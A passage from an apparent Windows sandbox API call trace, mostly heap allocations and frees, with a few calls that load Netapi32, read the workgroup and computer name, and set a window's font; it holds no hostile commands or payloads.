Flags=0x0, Size=0x10) returned 0xe7b198 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.752] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.752] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e00 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b258 [0254.753] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4df0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4de0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b210 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4df0 | out: hHeap=0xc60000) returned 1 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b210 | out: hHeap=0xc60000) returned 1 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4de0 | out: hHeap=0xc60000) returned 1 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec7c8 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4de0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b210 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4df0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dd0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b210 | out: hHeap=0xc60000) returned 1 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4df0 | out: hHeap=0xc60000) returned 1 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dd0 | out: hHeap=0xc60000) returned 1 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dd0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d08 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4df0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0254.753] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b210 [0254.753] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d08 | out: hHeap=0xc60000) returned 1 [0254.754] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4df0 | out: hHeap=0xc60000) returned 1 [0254.754] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b210 | out: hHeap=0xc60000) returned 1 [0254.754] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.754] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74470000 [0254.762] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b048 [0254.762] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0254.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0254.762] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x11) returned 0xec1c28 [0254.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0xec1c28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferSize", lpUsedDefaultChar=0x0) returned 17 [0254.762] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b048 | out: hHeap=0xc60000) returned 1 [0254.762] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec7f0 [0254.762] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec1c28 | out: hHeap=0xc60000) returned 1 [0254.762] GetProcAddress (hModule=0x74470000, lpProcName="NetApiBufferSize") returned 0x74513789 [0254.762] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec7f0 | out: hHeap=0xc60000) returned 1 [0254.762] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.762] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec7f0 [0254.762] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0254.762] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4df0 [0254.762] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.762] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4df0 | out: hHeap=0xc60000) returned 1 [0254.762] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec7f0 | out: hHeap=0xc60000) returned 1 [0254.762] NetApiBufferSize (in: Buffer=0xe978c0, ByteCount=0x87e490 | out: ByteCount=0x87e490) returned 0x0 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4df0 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xee8130 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe78af8 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b000 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b018 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ac8 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ac8 | out: hHeap=0xc60000) returned 1 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b018 | out: hHeap=0xc60000) returned 1 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b018 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ac8 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7afd0 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7afd0 | out: hHeap=0xc60000) returned 1 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ac8 | out: hHeap=0xc60000) returned 1 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ac8 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7afd0 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7afe8 [0254.763] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dc0 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7afe8 | out: hHeap=0xc60000) returned 1 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.763] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7afd0 | out: hHeap=0xc60000) returned 1 [0254.763] FreeLibrary (hLibModule=0x74470000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4de0 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dd0 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec7c8 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b258 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b300 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78df8 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b348 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b330 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78e28 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b360 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b138 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b240 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b1c8 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b180 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78c78 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b198 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec7a0 | out: hHeap=0xc60000) returned 1 [0254.766] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e10 | out: hHeap=0xc60000) returned 1 [0254.766] PeekMessageW (in: lpMsg=0x87eaf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eaf4) returned 0 [0254.766] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e10 [0254.766] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xee8350 [0254.766] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e00 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee8350 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.767] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.767] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec1c28 [0254.767] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dd0 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dd0 | out: hHeap=0xc60000) returned 1 [0254.767] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dd0 [0254.767] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec1bc8 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dd0 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec1bc8 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec1c28 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e10 | out: hHeap=0xc60000) returned 1 [0254.767] PeekMessageW (in: lpMsg=0x87eaf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eaf4) returned 0 [0254.767] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e10 [0254.767] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e00 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e10 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81a00 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2e8 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2d0 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e30 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec750 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b000 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b018 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ac8 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78af8 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee8130 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4df0 | out: hHeap=0xc60000) returned 1 [0254.767] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b318 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e20 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec778 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2a0 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e40 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec700 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d98 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec728 | out: hHeap=0xc60000) returned 1 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d98 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b2a0 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e40 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4e20 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec728 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2a0 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e40 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d98 | out: hHeap=0xc60000) returned 1 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d98 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d98 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec1c08 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ea0 | out: hHeap=0xc60000) returned 1 [0254.768] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e90 | out: hHeap=0xc60000) returned 1 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78d98 [0254.768] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4e90 [0254.769] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e90 | out: hHeap=0xc60000) returned 1 [0254.769] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xec1c08 [0254.779] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b270 | out: hHeap=0xc60000) returned 1 [0254.779] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0254.779] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78af8 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4250 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b168 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76908 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b018 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2e8 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766f8 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76830 | out: hHeap=0xc60000) returned 1 [0254.780] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec390 | out: hHeap=0xc60000) returned 1 [0254.780] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.786] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x87eae0, BufferType=0x87eaf8 | out: lpNameBuffer=0x87eae0*="WORKGROUP", BufferType=0x87eaf8) returned 0x0 [0254.793] NetApiBufferSize (in: Buffer=0xe978c0, ByteCount=0x87e490 | out: ByteCount=0x87e490) returned 0x0 [0254.800] GetComputerNameW (in: lpBuffer=0x87f2b0, nSize=0x87f5cc | out: lpBuffer="XDUWTFONO", nSize=0x87f5cc) returned 1 [0254.802] GetWindowTextLengthW (hWnd=0x3015e) returned 413 [0254.802] SendMessageW (hWnd=0x3015e, Msg=0xb1, wParam=0x19d, lParam=0x19d) returned 0x1 [0254.802] GetClientRect (in: hWnd=0x3015e, lpRect=0x87f600 | out: lpRect=0x87f600) returned 1 [0254.802] GetWindowRect (in: hWnd=0x3015e, lpRect=0x87f600 | out: lpRect=0x87f600) returned 1 [0254.802] SetWindowLongW (hWnd=0x3015e, nIndex=-21, dwNewLong=8) returned 0 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee8888 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee8400 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b108 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766f8 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b1b0 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aee0 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b1e0 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b018 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768d8 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec7f0 | out: hHeap=0xc60000) returned 1 [0254.802] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41f0 | out: hHeap=0xc60000) returned 1 [0254.802] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec7f0 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768d8 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed41f0 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b018 [0254.803] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec840 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b1e0 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d10 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dd0 [0254.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dd0 | out: hHeap=0xc60000) returned 1 [0254.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7aee0 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d10 [0254.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b1b0 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d10 [0254.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe766f8 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d10 [0254.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b108 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4d10 [0254.803] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768c0 [0254.803] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b378 [0254.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d10 [0254.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b060 [0254.804] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4dd0 [0254.804] GetDC (hWnd=0x0) returned 0xd010720 [0254.804] GetDeviceCaps (hdc=0xd010720, index=90) returned 96 [0254.804] ReleaseDC (hWnd=0x0, hDC=0xd010720) returned 1 [0254.804] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x1f0a06f8 [0254.804] SendMessageW (hWnd=0x3015e, Msg=0x30, wParam=0x1f0a06f8, lParam=0x1) returned 0x1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b060 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dd0 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b378 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d10 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b1e0 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7aee0 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b1b0 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766f8 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768c0 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b108 | out: hHeap=0xc60000) returned 1 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec840 | out: hHeap=0xc60000) returned 1 [0254.811] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.811] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeb4ee8 | out: hHeap=0xc60000) returned 1 [0254.811] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec840 [0254.811] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b108 [0254.811] RtlAllocateHeap (HeapHandle=0xc60000, 